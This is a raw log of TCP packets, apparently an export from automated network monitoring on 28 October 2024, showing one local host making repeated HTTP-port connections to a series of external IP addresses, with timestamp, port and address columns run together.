                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.448774099 CET4975680192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.448924065 CET4975680192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.448924065 CET4975680192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.454392910 CET8049756172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.454776049 CET8049756172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.118503094 CET8049756172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.118598938 CET4975680192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.118666887 CET4975680192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.124075890 CET8049756172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.144915104 CET4975780192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.150382996 CET8049757172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.150496006 CET4975780192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.150809050 CET4975780192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.150809050 CET4975780192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.156232119 CET8049757172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.156567097 CET8049757172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.823122025 CET8049757172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.823199034 CET4975780192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.823262930 CET4975780192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.828737974 CET8049757172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.965039015 CET4975880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.970670938 CET804975834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.970789909 CET4975880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.970911026 CET4975880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.970940113 CET4975880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.976537943 CET804975834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.976598024 CET804975834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:41.938535929 CET804975834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:41.939357996 CET4975880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:41.945743084 CET804975834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:41.945869923 CET4975880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.093286037 CET4975980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.098752975 CET804975918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.098891973 CET4975980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.098999023 CET4975980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.099028111 CET4975980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.104356050 CET804975918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.104372025 CET804975918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.759949923 CET804975918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.760196924 CET4975980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.766102076 CET804975918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.766194105 CET4975980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.896640062 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.902404070 CET8049760208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.902513981 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.902729034 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.902765989 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.908435106 CET8049760208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.908458948 CET8049760208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.534274101 CET8049760208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.555001020 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.555073023 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.560638905 CET8049760208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.560714960 CET8049760208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.699248075 CET8049760208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.746908903 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.944057941 CET4976180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.949652910 CET804976113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.949781895 CET4976180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.963346004 CET4976180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.963610888 CET4976180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.971839905 CET804976113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.971858978 CET804976113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.398087025 CET804976113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.399324894 CET4976180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.405653000 CET804976113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.405719995 CET4976180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.548485994 CET4976280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.554044962 CET804976244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.554155111 CET4976280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.554348946 CET4976280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.554375887 CET4976280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.559851885 CET804976244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.559926033 CET804976244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.224875927 CET804976244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.225112915 CET4976280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.231323004 CET804976244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.231578112 CET4976280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.319061041 CET4976380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.324629068 CET804976354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.324707031 CET4976380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.329646111 CET4976380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.329866886 CET4976380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.335421085 CET804976354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.335444927 CET804976354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:47.151242971 CET804976354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:47.200046062 CET4976380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:47.268729925 CET804976354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:47.268935919 CET4976380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:47.536294937 CET4976380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:47.541793108 CET804976354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.690663099 CET4976480192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.696685076 CET804976435.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.696784019 CET4976480192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.697072983 CET4976480192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.697103977 CET4976480192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.703178883 CET804976435.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.703212976 CET804976435.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.533227921 CET804976435.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.533507109 CET4976480192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.539295912 CET804976435.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.539359093 CET4976480192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.789299965 CET4976580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.794912100 CET80497653.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.795006990 CET4976580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.795176983 CET4976580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.795200109 CET4976580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.800563097 CET80497653.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.800597906 CET80497653.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.469099998 CET80497653.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.469304085 CET4976580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.475191116 CET80497653.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.475248098 CET4976580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.612219095 CET4976680192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.617830992 CET8049766165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.617921114 CET4976680192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.618063927 CET4976680192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.618099928 CET4976680192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.623414993 CET8049766165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.623439074 CET8049766165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.321888924 CET8049766165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.371917963 CET4976680192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.514925003 CET4976680192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.514952898 CET4976680192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.520437002 CET8049766165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.520457983 CET8049766165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.691634893 CET8049766165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.731338978 CET4976680192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.914307117 CET4976780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.920255899 CET804976754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.920341969 CET4976780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.920543909 CET4976780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.920604944 CET4976780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.926122904 CET804976754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.926136017 CET804976754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.761270046 CET804976754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.761517048 CET4976780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.769144058 CET804976754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.771164894 CET4976780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.960551977 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.960938931 CET4976880192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.966396093 CET8049760208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.966433048 CET8049768208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.966478109 CET4976080192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.966538906 CET4976880192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.966738939 CET4976880192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.966738939 CET4976880192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.972095013 CET8049768208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.972492933 CET8049768208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.653592110 CET8049768208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.696023941 CET4976880192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.696077108 CET4976880192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.701921940 CET8049768208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.702014923 CET8049768208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.844095945 CET8049768208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.887593031 CET4976880192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:54.120400906 CET4976980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:54.126106977 CET804976934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:54.126198053 CET4976980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:54.126360893 CET4976980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:54.126410007 CET4976980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:54.131742954 CET804976934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:54.132050991 CET804976934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.174616098 CET804976934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.174926996 CET4976980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.175017118 CET804976934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.175033092 CET804976934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.175065994 CET4976980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.175081968 CET4976980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.180532932 CET804976934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.385205984 CET4977080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.390925884 CET804977054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.391011000 CET4977080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.391169071 CET4977080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.391195059 CET4977080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.396836996 CET804977054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.396867990 CET804977054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.247502089 CET804977054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.248697042 CET4977080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.254473925 CET804977054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.254816055 CET4977080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.432806969 CET4977180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.438376904 CET804977118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.438452959 CET4977180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.448688030 CET4977180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.448709965 CET4977180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.454179049 CET804977118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.454196930 CET804977118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:57.995876074 CET804977118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:57.996067047 CET4977180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.002501965 CET804977118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.003628016 CET4977180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.287672043 CET4977280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.293245077 CET804977218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.293332100 CET4977280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.293490887 CET4977280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.293512106 CET4977280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.298871994 CET804977218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.298930883 CET804977218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.948283911 CET804977218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.948496103 CET4977280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.954353094 CET804977218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.954444885 CET4977280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.162934065 CET4977480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.168488979 CET804977444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.168562889 CET4977480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.168756008 CET4977480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.168903112 CET4977480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.174047947 CET804977444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.174189091 CET804977444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.839534998 CET804977444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.839715958 CET4977480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.845865965 CET804977444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.845951080 CET4977480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.186892986 CET4977680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.192472935 CET804977618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.192570925 CET4977680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.192723036 CET4977680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.192749977 CET4977680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.198220968 CET804977618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.198460102 CET804977618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.661093950 CET804977618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.661319971 CET4977680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.667133093 CET804977618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.667195082 CET4977680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.871937990 CET4978780192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.877351046 CET804978718.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.879184008 CET4978780192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.879339933 CET4978780192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.879339933 CET4978780192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.885039091 CET804978718.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.885070086 CET804978718.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:02.700972080 CET804978718.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:02.705830097 CET4978780192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:02.711735964 CET804978718.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:02.711792946 CET4978780192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.003751040 CET4979780192.168.2.418.208.156.248
